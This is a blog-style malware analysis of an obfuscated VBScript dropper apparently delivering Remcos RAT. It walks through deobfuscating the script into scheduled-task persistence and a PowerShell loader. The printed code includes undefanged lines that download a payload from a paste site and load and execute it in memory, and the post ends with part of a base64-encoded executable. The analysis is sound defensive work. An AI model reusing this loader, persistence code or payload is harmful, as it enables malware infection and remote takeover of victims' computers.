Summary
=========
The last time I “published” anything was about a 1.8 years or so ago. So in the spirit of New Years resolutions to myself it really has come time for me to get back on the horse and get back into some sort of posting again. So let’s jump into an alert that I came across for what looks to be Remcos RAT.
Link to the artifacts from this investigation can be found over at my Github here which also includes the output from the two URLs seen in the VB script. The memory dump of the Remcos process can be found here instead.
Initial Analysis
=============
Based on initial investigation, the VB script was downloaded directly from hxxps://hidrive[.]ionos[.]com/lnk/SBBJoDne#file with no referrer or anything of the sort. Once the file is executed the following process tree can be seen.
Looking at what was inside this VB script file, initially there seems to be a lot of noise/garbage as one would expect.
'//////////////////////////////////////////////////////////////////////////////////////// '//////////////////////////////////////////////////////////////////////////////////////// 'Reads the registry looking for a JoYB qxtjb and if found reports whether or not 'that qxtjb enables JoYB. Function OoUrkN(qxtjb, UHnWO) On Error Resume Next Dim OWOhO, PeQGtlValue PeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb) If Err.Number = 0 Then If PeQGtlValue = 1 Then YryWTxZYO UHnWO & QLNYHYaBW OWOhO = True Else YryWTxZYO UHnWO & DkIekRQq OWOhO = False End If YryWTxZYO qxtjb YryWTxZYO qNDMMM Else OWOhO = False End If Err.Clear OoUrkN = OWOhO End Function '//////////////////////////////////////////////////////////////////////////////////////// 'Checks the registry for a particular qxtjb that enables JoYB in one specific 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, 'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16 Function xOdtc(DgWuA) On Error Resume Next OWOhO = False If (DfaDL = KcnsL) Then OWOhO = OoUrkN(qxtjb, UHnWO) ElseIf (DfaDL = yrHLz) Then Dim amTLpM, USKNnw For Each amTLpM In JYXNc USKNnw = qxtjb & amTLpM & wpunit OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO) Next End If xOdtc = OWOhO End Function '//////////////////////////////////////////////////////////////////////////////////////// 'Checks the registry for a particular qxtjb that enables JoYB in one specific 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, 'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16 Function xOdtc(DgWuA) On Error Resume Next OWOhO = False If (DfaDL = KcnsL) Then OWOhO = OoUrkN(qxtjb, UHnWO) ElseIf (DfaDL = yrHLz) Then Dim amTLpM, USKNnw For Each amTLpM In JYXNc USKNnw = qxtjb & amTLpM & wpunit OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO) Next End If xOdtc = OWOhO End Function '//////////////////////////////////////////////////////////////////////////////////////// 'Checks the registry for a particular qxtjb that enables JoYB in one specific 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, 'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16 Function xOdtc(DgWuA) On Error Resume Next OWOhO = False If (DfaDL = KcnsL) Then OWOhO = OoUrkN(qxtjb, UHnWO) ElseIf (DfaDL = yrHLz) Then Dim amTLpM, USKNnw For Each amTLpM In JYXNc USKNnw = qxtjb & amTLpM & wpunit OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO) Next End If xOdtc = OWOhO End Function '//////////////////////////////////////////////////////////////////////////////////////// 'Checks the registry for a particular qxtjb that enables JoYB in one specific 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, 'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16 Function xOdtc(DgWuA) On Error Resume Next OWOhO = False If (DfaDL = KcnsL) Then OWOhO = OoUrkN(qxtjb, UHnWO) ElseIf (DfaDL = yrHLz) Then Dim amTLpM, USKNnw For Each amTLpM In JYXNc USKNnw = qxtjb & amTLpM & wpunit OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO) Next End If xOdtc = OWOhO End Function '//////////////////////////////////////////////////////////////////////////////////////// 'Checks the registry for a particular qxtjb that enables JoYB in one specific 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, 'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16 Function xOdtc(DgWuA) On Error Resume Next OWOhO = False If (DfaDL = KcnsL) Then OWOhO = OoUrkN(qxtjb, UHnWO) ElseIf (DfaDL = yrHLz) Then Dim amTLpM, USKNnw For Each amTLpM In JYXNc USKNnw = qxtjb & amTLpM & wpunit OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO) Next End If xOdtc = OWOhO End Function On Error Resume Next if 0 then Set objShell = CreateObject("WScript.Shell") zoologico = "MinhaTarefaVBScript" eCoeCoeCoeCo = "schtasks /delete /tn " & zoologico & " /f" objShell.Run eCoeCoeCoeCo, 0, True strScriptPath = WScript.ScriptFullName strTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%") Mirasoles = strTempFolder & "\SeuScript.vbs" ' Cria um objeto FileSystemObject Set objFSO = CreateObject("Scripting.FileSystemObject") On Error Resume Next ' Tenta copiar o arquivo para a pasta tempor?ria objFSO.CopyFile strScriptPath, Mirasoles, True If Err.Number <> 0 Then MsgBox "Erro ao copiar o arquivo para a pasta tempor?ria: " & Err.Description End If On Error GoTo 0 strCreateCommand = "schtasks /create /tn " & zoologico & " /tr """ & Mirasoles & """ /sc minute /mo 1" objShell.Run strCreateCommand, 0, True end if On Error Resume Next '//////////////////////////////////////////////////////////////////////////////////////// 'Checks the registry for a particular qxtjb that enables JoYB in one specific 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, 'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16 Function xOdtc(DgWuA) On Error Resume Next OWOhO = False If (DfaDL = KcnsL) Then OWOhO = OoUrkN(qxtjb, UHnWO) ElseIf (DfaDL = yrHLz) Then Dim amTLpM, USKNnw For Each amTLpM In JYXNc USKNnw = qxtjb & amTLpM & wpunit OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO) Next End If xOdtc = OWOhO End Function On Error Resume Next mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou: mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou: mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou: dim ARmxU ARmxU = WScript.ScriptFullName HwxcO = ("J?%Bl?%G8?%a?%Bl?%HE?%I?%?%9?%C?%?%Jw?%w?%DM?%Jw?%7?%CQ?%cgBk?%GE?%dQBu?%C?%?%PQ?%g?%Cc?%JQBw?%Ho?%QQBj?%E8?%ZwBJ?%G4?%TQBy?%CU?%Jw?%7?%Fs?%QgB5?%HQ?%ZQBb?%F0?%XQ?%g?%CQ?%Z?%Bo?%Gc?%b?%Bs?%C?%?%PQ?%g?%Fs?%cwB5?%HM?%d?%Bl?%G0?%LgBD?%G8?%bgB2?%GU?%cgB0?%F0?%Og?%6?%EY?%cgBv?%G0?%QgBh?%HM?%ZQ?%2?%DQ?%UwB0?%HI?%aQBu?%Gc?%K?%?%g?%Cg?%TgBl?%Hc?%LQBP?%GI?%agBl?%GM?%d?%?%g?%E4?%ZQB0?%C4?%VwBl?%GI?%QwBs?%Gk?%ZQBu?%HQ?%KQ?%u?%EQ?%bwB3?%G4?%b?%Bv?%GE?%Z?%BT?%HQ?%cgBp?%G4?%Zw?%o?%C?%?%K?%BO?%GU?%dw?%t?%E8?%YgBq?%GU?%YwB0?%C?%?%TgBl?%HQ?%LgBX?%GU?%YgBD?%Gw?%aQBl?%G4?%d?%?%p?%C4?%R?%Bv?%Hc?%bgBs?%G8?%YQBk?%FM?%d?%By?%Gk?%bgBn?%Cg?%JwBo?%HQ?%d?%Bw?%HM?%Og?%v?%C8?%d?%Bl?%Hg?%d?%Bi?%Gk?%bg?%u?%G4?%ZQB0?%C8?%cgBh?%Hc?%LwBl?%Ho?%agBt?%G8?%ZgB6?%DM?%cw?%2?%Cc?%KQ?%g?%Ck?%I?%?%p?%Ds?%WwBz?%Hk?%cwB0?%GU?%bQ?%u?%EE?%c?%Bw?%EQ?%bwBt?%GE?%aQBu?%F0?%Og?%6?%EM?%dQBy?%HI?%ZQBu?%HQ?%R?%Bv?%G0?%YQBp?%G4?%LgBM?%G8?%YQBk?%Cg?%J?%Bk?%Gg?%ZwBs?%Gw?%KQ?%u?%Ec?%ZQB0?%FQ?%eQBw?%GU?%K?%?%n?%E0?%YQBy?%GE?%YwBh?%Gk?%YgBv?%C4?%QwBs?%GE?%cwBz?%DE?%Jw?%p?%C4?%RwBl?%HQ?%TQBl?%HQ?%a?%Bv?%GQ?%K?%?%n?%E0?%cwBx?%EI?%SQBi?%Fk?%Jw?%p?%C4?%SQBu?%HY?%bwBr?%GU?%K?%?%k?%G4?%dQBs?%Gw?%L?%?%g?%Fs?%bwBi?%Go?%ZQBj?%HQ?%WwBd?%F0?%I?%?%o?%Cc?%M?%?%v?%Es?%dwBC?%FI?%Vw?%v?%GQ?%LwBl?%GU?%LgBl?%HQ?%cwBh?%H?%?%Lw?%v?%Do?%cwBw?%HQ?%d?%Bo?%Cc?%I?%?%s?%C?%?%J?%By?%GQ?%YQB1?%G4?%I?%?%s?%C?%?%JwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%LQ?%t?%C0?%LQ?%t?%C0?%LQ?%n?%Cw?%I?%?%k?%GU?%bwBo?%GU?%cQ?%s?%C?%?%Jw?%x?%Cc?%L?%?%g?%Cc?%UgBv?%GQ?%YQ?%n?%C?%?%KQ?%p?%Ds?%") dim waalb waalb = ("$dgUdYL = '") & HwxcO & "'" waalb = waalb & ";$KByHL = [system.Text.Encoding]::Unicode.GetString( " '//////////////////////////////////////////////////////////////////////////////////////// '//////////////////////////////////////////////////////////////////////////////////////// 'Reads the registry looking for a JoYB qxtjb and if found reports whether or not 'that qxtjb enables JoYB. Function OoUrkN(qxtjb, UHnWO) On Error Resume Next Dim OWOhO, PeQGtlValue PeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb) If Err.Number = 0 Then If PeQGtlValue = 1 Then YryWTxZYO UHnWO & QLNYHYaBW OWOhO = True Else YryWTxZYO UHnWO & DkIekRQq OWOhO = False End If YryWTxZYO qxtjb YryWTxZYO qNDMMM Else OWOhO = False End If Err.Clear OoUrkN = OWOhO End Function '//////////////////////////////////////////////////////////////////////////////////////// 'Checks the registry for a particular qxtjb that enables JoYB in one specific 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, 'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16 Function xOdtc(DgWuA) On Error Resume Next OWOhO = False If (DfaDL = KcnsL) Then OWOhO = OoUrkN(qxtjb, UHnWO) ElseIf (DfaDL = yrHLz) Then
Once the script was cleaned up using CyberChef and the unique recipe, this is what was left.
'Reads the registry looking for a JoYB qxtjb and if found reports whether or not 'that qxtjb enables JoYB. Function OoUrkN(qxtjb, UHnWO) On Error Resume Next Dim OWOhO, PeQGtlValue PeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb) If Err.Number = 0 Then If PeQGtlValue = 1 Then YryWTxZYO UHnWO & QLNYHYaBW OWOhO = True Else YryWTxZYO UHnWO & DkIekRQq OWOhO = False End If YryWTxZYO qxtjb YryWTxZYO qNDMMM Else OWOhO = False End If Err.Clear OoUrkN = OWOhO End Function 'Checks the registry for a particular qxtjb that enables JoYB in one specific 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, 'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16 Function xOdtc(DgWuA) OWOhO = False If (DfaDL = KcnsL) Then OWOhO = OoUrkN(qxtjb, UHnWO) ElseIf (DfaDL = yrHLz) Then Dim amTLpM, USKNnw For Each amTLpM In JYXNc USKNnw = qxtjb & amTLpM & wpunit OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO) Next xOdtc = OWOhO On Error Resume Next if 0 then Set objShell = CreateObject("WScript.Shell") zoologico = "MinhaTarefaVBScript" eCoeCoeCoeCo = "schtasks /delete /tn " & zoologico & " /f" objShell.Run eCoeCoeCoeCo, 0, True strScriptPath = WScript.ScriptFullName strTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%") Mirasoles = strTempFolder & "\SeuScript.vbs" ' Cria um objeto FileSystemObject Set objFSO = CreateObject("Scripting.FileSystemObject") On Error Resume Next ' Tenta copiar o arquivo para a pasta tempor�ria objFSO.CopyFile strScriptPath, Mirasoles, True If Err.Number <> 0 Then MsgBox "Erro ao copiar o arquivo para a pasta tempor�ria: " & Err.Description End If On Error GoTo 0 strCreateCommand = "schtasks /create /tn " & zoologico & " /tr """ & Mirasoles & """ /sc minute /mo 1" objShell.Run strCreateCommand, 0, True end if mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou: dim ARmxU ARmxU = WScript.ScriptFullName HwxcO = ("J�%Bl�%G8�%a�%Bl�%HE�%I�%�%9�%C�%�%Jw�%w�%DM�%Jw�%7�%CQ�%cgBk�%GE�%dQBu�%C�%�%PQ�%g�%Cc�%JQBw�%Ho�%QQBj�%E8�%ZwBJ�%G4�%TQBy�%CU�%Jw�%7�%Fs�%QgB5�%HQ�%ZQBb�%F0�%XQ�%g�%CQ�%Z�%Bo�%Gc�%b�%Bs�%C�%�%PQ�%g�%Fs�%cwB5�%HM�%d�%Bl�%G0�%LgBD�%G8�%bgB2�%GU�%cgB0�%F0�%Og�%6�%EY�%cgBv�%G0�%QgBh�%HM�%ZQ�%2�%DQ�%UwB0�%HI�%aQBu�%Gc�%K�%�%g�%Cg�%TgBl�%Hc�%LQBP�%GI�%agBl�%GM�%d�%�%g�%E4�%ZQB0�%C4�%VwBl�%GI�%QwBs�%Gk�%ZQBu�%HQ�%KQ�%u�%EQ�%bwB3�%G4�%b�%Bv�%GE�%Z�%BT�%HQ�%cgBp�%G4�%Zw�%o�%C�%�%K�%BO�%GU�%dw�%t�%E8�%YgBq�%GU�%YwB0�%C�%�%TgBl�%HQ�%LgBX�%GU�%YgBD�%Gw�%aQBl�%G4�%d�%�%p�%C4�%R�%Bv�%Hc�%bgBs�%G8�%YQBk�%FM�%d�%By�%Gk�%bgBn�%Cg�%JwBo�%HQ�%d�%Bw�%HM�%Og�%v�%C8�%d�%Bl�%Hg�%d�%Bi�%Gk�%bg�%u�%G4�%ZQB0�%C8�%cgBh�%Hc�%LwBl�%Ho�%agBt�%G8�%ZgB6�%DM�%cw�%2�%Cc�%KQ�%g�%Ck�%I�%�%p�%Ds�%WwBz�%Hk�%cwB0�%GU�%bQ�%u�%EE�%c�%Bw�%EQ�%bwBt�%GE�%aQBu�%F0�%Og�%6�%EM�%dQBy�%HI�%ZQBu�%HQ�%R�%Bv�%G0�%YQBp�%G4�%LgBM�%G8�%YQBk�%Cg�%J�%Bk�%Gg�%ZwBs�%Gw�%KQ�%u�%Ec�%ZQB0�%FQ�%eQBw�%GU�%K�%�%n�%E0�%YQBy�%GE�%YwBh�%Gk�%YgBv�%C4�%QwBs�%GE�%cwBz�%DE�%Jw�%p�%C4�%RwBl�%HQ�%TQBl�%HQ�%a�%Bv�%GQ�%K�%�%n�%E0�%cwBx�%EI�%SQBi�%Fk�%Jw�%p�%C4�%SQBu�%HY�%bwBr�%GU�%K�%�%k�%G4�%dQBs�%Gw�%L�%�%g�%Fs�%bwBi�%Go�%ZQBj�%HQ�%WwBd�%F0�%I�%�%o�%Cc�%M�%�%v�%Es�%dwBC�%FI�%Vw�%v�%GQ�%LwBl�%GU�%LgBl�%HQ�%cwBh�%H�%�%Lw�%v�%Do�%cwBw�%HQ�%d�%Bo�%Cc�%I�%�%s�%C�%�%J�%By�%GQ�%YQB1�%G4�%I�%�%s�%C�%�%JwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%LQ�%t�%C0�%LQ�%t�%C0�%LQ�%n�%Cw�%I�%�%k�%GU�%bwBo�%GU�%cQ�%s�%C�%�%Jw�%x�%Cc�%L�%�%g�%Cc�%UgBv�%GQ�%YQ�%n�%C�%�%KQ�%p�%Ds�%") $eoheq = '03'; $rdaun = '%pzAcOgInMr%'; Byte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) ); [system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/KwBRW/d/ee.etsap//:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' )); dim waalb waalb = ("$dgUdYL = '") & HwxcO & "'" waalb = waalb & "; $KByHL = [system.Text.Encoding]::Unicode.GetString( " waalb = waalb & "[system.Convert]::FromBase64String( $dgUdYL.replace('�%','A') ) )" 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, '//////////////////////////////////////////////////////////////////////////////////////// '//////////////////////////////////////////////////////////////////////////////////////// waalb = waalb & "; $KByHL = $KByHL.replace('%pzAcOgInMr%', '" & ARmxU & "');powershell -command $KByHL;" set sjddc = CreateObject("WScript.Shell") sjddc.Run "powershell -command " & (waalb) , 0, false End function Set JYXNc = vkrLKQUSi("lsZsUULOa") '//////////////////////////////////////////////////////////////////////////////////////// '////////////////////////////////////////////////////////////////////////////////////////
Quickly looking at the remains of the script and just checking the different variables here and there, it looks like the actual script is just the below part.
NOTE: I am not fluent in the way of coding/scripting, so I could be very off the mark here. If so, please let me know.
Set objShell = CreateObject("WScript.Shell") zoologico = "MinhaTarefaVBScript" eCoeCoeCoeCo = "schtasks /delete /tn " & zoologico & " /f" objShell.Run eCoeCoeCoeCo, 0, True strScriptPath = WScript.ScriptFullName strTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%") Mirasoles = strTempFolder & "\SeuScript.vbs" ' Cria um objeto FileSystemObject Set objFSO = CreateObject("Scripting.FileSystemObject") On Error Resume Next ' Tenta copiar o arquivo para a pasta tempor�ria objFSO.CopyFile strScriptPath, Mirasoles, True If Err.Number <> 0 Then MsgBox "Erro ao copiar o arquivo para a pasta tempor�ria: " & Err.Description End If On Error GoTo 0 strCreateCommand = "schtasks /create /tn " & zoologico & " /tr """ & Mirasoles & """ /sc minute /mo 1" objShell.Run strCreateCommand, 0, True end if mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou: dim ARmxU ARmxU = WScript.ScriptFullName HwxcO = ("J�%Bl�%G8�%a�%Bl�%HE�%I�%�%9�%C�%�%Jw�%w�%DM�%Jw�%7�%CQ�%cgBk�%GE�%dQBu�%C�%�%PQ�%g�%Cc�%JQBw�%Ho�%QQBj�%E8�%ZwBJ�%G4�%TQBy�%CU�%Jw�%7�%Fs�%QgB5�%HQ�%ZQBb�%F0�%XQ�%g�%CQ�%Z�%Bo�%Gc�%b�%Bs�%C�%�%PQ�%g�%Fs�%cwB5�%HM�%d�%Bl�%G0�%LgBD�%G8�%bgB2�%GU�%cgB0�%F0�%Og�%6�%EY�%cgBv�%G0�%QgBh�%HM�%ZQ�%2�%DQ�%UwB0�%HI�%aQBu�%Gc�%K�%�%g�%Cg�%TgBl�%Hc�%LQBP�%GI�%agBl�%GM�%d�%�%g�%E4�%ZQB0�%C4�%VwBl�%GI�%QwBs�%Gk�%ZQBu�%HQ�%KQ�%u�%EQ�%bwB3�%G4�%b�%Bv�%GE�%Z�%BT�%HQ�%cgBp�%G4�%Zw�%o�%C�%�%K�%BO�%GU�%dw�%t�%E8�%YgBq�%GU�%YwB0�%C�%�%TgBl�%HQ�%LgBX�%GU�%YgBD�%Gw�%aQBl�%G4�%d�%�%p�%C4�%R�%Bv�%Hc�%bgBs�%G8�%YQBk�%FM�%d�%By�%Gk�%bgBn�%Cg�%JwBo�%HQ�%d�%Bw�%HM�%Og�%v�%C8�%d�%Bl�%Hg�%d�%Bi�%Gk�%bg�%u�%G4�%ZQB0�%C8�%cgBh�%Hc�%LwBl�%Ho�%agBt�%G8�%ZgB6�%DM�%cw�%2�%Cc�%KQ�%g�%Ck�%I�%�%p�%Ds�%WwBz�%Hk�%cwB0�%GU�%bQ�%u�%EE�%c�%Bw�%EQ�%bwBt�%GE�%aQBu�%F0�%Og�%6�%EM�%dQBy�%HI�%ZQBu�%HQ�%R�%Bv�%G0�%YQBp�%G4�%LgBM�%G8�%YQBk�%Cg�%J�%Bk�%Gg�%ZwBs�%Gw�%KQ�%u�%Ec�%ZQB0�%FQ�%eQBw�%GU�%K�%�%n�%E0�%YQBy�%GE�%YwBh�%Gk�%YgBv�%C4�%QwBs�%GE�%cwBz�%DE�%Jw�%p�%C4�%RwBl�%HQ�%TQBl�%HQ�%a�%Bv�%GQ�%K�%�%n�%E0�%cwBx�%EI�%SQBi�%Fk�%Jw�%p�%C4�%SQBu�%HY�%bwBr�%GU�%K�%�%k�%G4�%dQBs�%Gw�%L�%�%g�%Fs�%bwBi�%Go�%ZQBj�%HQ�%WwBd�%F0�%I�%�%o�%Cc�%M�%�%v�%Es�%dwBC�%FI�%Vw�%v�%GQ�%LwBl�%GU�%LgBl�%HQ�%cwBh�%H�%�%Lw�%v�%Do�%cwBw�%HQ�%d�%Bo�%Cc�%I�%�%s�%C�%�%J�%By�%GQ�%YQB1�%G4�%I�%�%s�%C�%�%JwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%LQ�%t�%C0�%LQ�%t�%C0�%LQ�%n�%Cw�%I�%�%k�%GU�%bwBo�%GU�%cQ�%s�%C�%�%Jw�%x�%Cc�%L�%�%g�%Cc�%UgBv�%GQ�%YQ�%n�%C�%�%KQ�%p�%Ds�%") $eoheq = '03'; $rdaun = '%pzAcOgInMr%'; Byte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) ); [system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/KwBRW/d/ee.etsap//:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' )); dim waalb waalb = ("$dgUdYL = '") & HwxcO & "'" waalb = waalb & "; $KByHL = [system.Text.Encoding]::Unicode.GetString( " waalb = waalb & "[system.Convert]::FromBase64String( $dgUdYL.replace('�%','A') ) )" 'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf, waalb = waalb & "; $KByHL = $KByHL.replace('%pzAcOgInMr%', '" & ARmxU & "');powershell -command $KByHL;" set sjddc = CreateObject("WScript.Shell") sjddc.Run "powershell -command " & (waalb) , 0, false End function
So running through the script it seems that the initial section sets up:
- the creation of the object in memory
- the scheduled task within Windows
- using the %TEMP% environment variable to copy the VB script file into whatever the %TEMP% variable is on the system
- so nice of the author to let the user know if there was an issue with copying the file to the %TEMP% directory via a pop-up – lulz
Further down there is a block of what appears to base64 encoded text with an additional character added in to it. The hint that this is a base64 string is due to the below line which is also replacing the additional character of ‘�%’ with an ‘A’:
waalb = waalb & "[system.Convert]::FromBase64String( $dgUdYL.replace('�%','A') ) )"
The following is the base64 block decoded using CyberChef once again.
$eoheq = '03'; $rdaun = '%pzAcOgInMr%'; Byte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) ); [system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/KwBRW/d/ee.etsap//:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' ));
Ok cool. So if I am doing the deobfuscation correctly here, the bottom half of the script looks like this.
ARmxU = WScript.ScriptFullName HwxcO = ("$eoheq = '03'; $rdaun = '%pzAcOgInMr%';   Byte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) ); [system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/KwBRW/d/ee.etsap//:sptth' , %pzAcOgInMr% , '____________________________________________-------', 03, '1', 'Roda' ));") $KByHL = $KByHL.replace('%pzAcOgInMr%', '" & ARmxU & "'); powershell -command $KByHL;" set sjddc =  CreateObject("WScript.Shell") sjddc.Run "powershell -command " & (waalb) , 0, false
So the first URL that is listed (hxxps://textbin[.]net/raw/ezjmofz3s6) is a redirect (see the urlscan here) and goes to hxxps://pasteio[.]com/download/xNVOEKuDyLXR. I could not get the TXT file from URLScan as seen here, so I ended up using Any.Run to get the file, and then later using pasteio.com to decode the URL to get the same identical file that I got from Any.Run. The file obtained from hxxps://pasteio[.]com/download/xNVOEKuDyLXR was the following:
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